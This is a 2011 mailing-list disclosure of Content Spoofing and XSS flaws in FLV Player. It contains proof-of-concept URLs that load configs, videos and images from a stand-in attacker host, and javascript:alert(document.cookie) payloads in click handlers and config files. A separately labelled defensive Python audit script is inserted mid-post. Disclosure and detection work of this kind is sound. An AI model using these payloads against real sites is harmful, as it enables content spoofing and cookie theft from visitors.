Open Source and information security mailing list archives
Date: Mon, 22 Aug 2011 18:42:00 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Vulnerabilities in FLV Player

Hello list!

I want to warn you about Content Spoofing and Cross-Site Scripting
vulnerabilities in FLV Player.

-------------------------
Affected products:
-------------------------

Several versions of FLV Player are vulnerable (MINI, NORMAL, MAXI and
MULTI). Note that the NORMAL version ships under the file names player_flv.swf
and player_flv_classic.swf.

The author of FLV Player has not fixed these vulnerabilities.

----------
Details:
----------

Content Spoofing (WASC-12):

The FLV Player SWF files accept an arbitrary address in the configxml
parameter, which allows the content of the Flash player to be spoofed by
pointing it at a configuration file hosted on another site.

http://site/player_flv.swf?configxml=http://attacker/1.xml

http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml

http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

The FLV Player SWF files also accept an arbitrary address in the config
parameter, which allows the content of the Flash player to be spoofed in the
same way, by pointing it at a configuration file hosted on another site.

http://site/player_flv.swf?config=http://attacker/1.txt

http://site/player_flv_maxi.swf?config=http://attacker/1.txt

http://site/player_flv_multi.swf?config=http://attacker/1.txt

The FLV Player SWF files allow all important parameters to be overridden,
including flv and startimage, and accept arbitrary addresses in the flv and
startimage parameters, which allows the content of the Flash player to be
spoofed by supplying a video and a poster image from another site. Links to an
arbitrary site can be set with the onclick and ondoubleclick parameters.

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg

http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg

http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg

http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS (WASC-08):

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml

http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

File xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<config>
<param name="onclick" value="javascript:alert(document.cookie)" />
<param name="ondoubleclick" value="javascript:alert(document.cookie)" />
</config>

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt

http://site/player_flv_multi.swf?config=http://attacker/xss.txt

File xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

The code executes after a click (or double click) on the player, so this is
strictly social XSS: it requires user interaction. Because the javascript: URL
is navigated from the SWF, the script runs in the origin of the page that
embeds the player, which is why document.cookie is reachable.
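The following is an added example, not code from FLV Player or from the advisory's author, covering both the Content Spoofing and the XSS sections above. It audits the player parameters named in this advisory offline: URL-taking parameters (configxml, config, flv, startimage) that point at a host other than the one serving the SWF are reported as off-site, and onclick/ondoubleclick values carrying a javascript: URL are reported as script handlers. It also parses both remote config formats shown above (the XML <param name value> form and the key=value form) so a fetched config body can be audited the same way. The request URLs and config bodies it contains are constructed sample data that mirror the advisory's URL patterns; the host names site and attacker are placeholders.

```python
"""Offline audit of FLV Player request parameters and remote config bodies.

Added example; not FLV Player's own code. The SAMPLE_* data below is
constructed for illustration.
"""
from urllib.parse import parse_qs, urlsplit
import xml.etree.ElementTree as ET

# Parameters the advisory says accept arbitrary addresses.
URL_PARAMS = {"configxml", "config", "flv", "startimage"}
# Parameters the advisory says are invoked on (double) click.
HANDLER_PARAMS = {"onclick", "ondoubleclick"}


def parse_config(text):
    """Parse a config body in either format from the advisory into a dict.

    XML form:   <config><param name="flv" value="..."/></config>
    Plain form: one key=value per line (the .txt form).
    """
    body = text.strip()
    if body.startswith("<"):
        # xml.etree does not fetch external entities, so an attacker-supplied
        # body cannot be turned into XXE here.
        root = ET.fromstring(body)
        return {p.get("name", ""): p.get("value", "") for p in root.iter("param")}
    params = {}
    for line in body.splitlines():
        if "=" in line:
            key, _, value = line.partition("=")
            params[key.strip()] = value.strip()
    return params


def audit_params(params, site_host):
    """Return a list of (parameter, reason) findings for one parameter set.

    site_host is the host serving the SWF. A URL parameter whose host differs
    is reported as offsite; a click handler whose scheme is javascript: is
    reported as a script handler. Relative paths (no host) are treated as
    same-site and not reported.
    """
    findings = []
    for name, value in params.items():
        key = name.lower()
        if key in URL_PARAMS:
            host = urlsplit(value).hostname
            if host and host.lower() != site_host.lower():
                findings.append((key, "offsite:" + host))
        elif key in HANDLER_PARAMS:
            if value.strip().lower().partition(":")[0] == "javascript":
                findings.append((key, "javascript-handler"))
    return findings


def audit_request(url, remote_configs=None):
    """Audit one request to a player SWF.

    remote_configs maps config URLs to already-fetched bodies (supplied inline
    so the example runs offline). When config or configxml points at one of
    them, its parameters are audited too, prefixed with 'config->' etc.
    """
    parts = urlsplit(url)
    site_host = parts.hostname or ""
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    findings = audit_params(params, site_host)
    for key in ("configxml", "config"):
        body = (remote_configs or {}).get(params.get(key, ""))
        if body is not None:
            findings += [(key + "->" + p, r) for p, r in audit_params(parse_config(body), site_host)]
    return findings


# Constructed sample requests following the advisory's patterns, plus one benign request.
SAMPLE_REQUESTS = [
    "http://site/player_flv.swf?configxml=http://attacker/1.xml",
    "http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg",
    "http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)",
    "http://site/player_flv_maxi.swf?config=http://attacker/xss.txt",
    "http://site/player_flv.swf?flv=videos/intro.flv",
]
# Constructed config bodies standing in for what the attacker host would serve.
SAMPLE_CONFIGS = {
    "http://attacker/xss.txt": "onclick=javascript:alert(document.cookie)\n"
                               "ondoubleclick=javascript:alert(document.cookie)\n",
    "http://attacker/1.xml": '<?xml version="1.0" encoding="UTF-8"?>\n<config>\n'
                             '<param name="flv" value="http://attacker/1.flv" />\n</config>\n',
}


def audit_all(requests=SAMPLE_REQUESTS, configs=SAMPLE_CONFIGS):
    """Audit every request; returns {url: findings} for requests with findings."""
    report = {}
    for url in requests:
        findings = audit_request(url, configs)
        if findings:
            report[url] = findings
    return report


if __name__ == "__main__":
    for url, findings in audit_all().items():
        print(url)
        for param, reason in findings:
            print("   ", param, reason)
```

Run against a web server access log, the same audit_request call flags requests for player_flv*.swf whose parameters were abused, and the same audit_params check is the minimum a player should apply before loading a config, video, or poster from a caller-supplied address: restrict URL parameters to the SWF's own origin (or an explicit allowlist) and refuse non-http(s) schemes in click handlers.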

------------
Timeline:
------------

2011.02.24 - found these vulnerabilities in different versions of the player
and informed the owner of the site which used it.
2011.04.21 - announced at my site.
2011.04.22 - informed the developer.
2011.08.20 - disclosed at my site.

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/5098/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
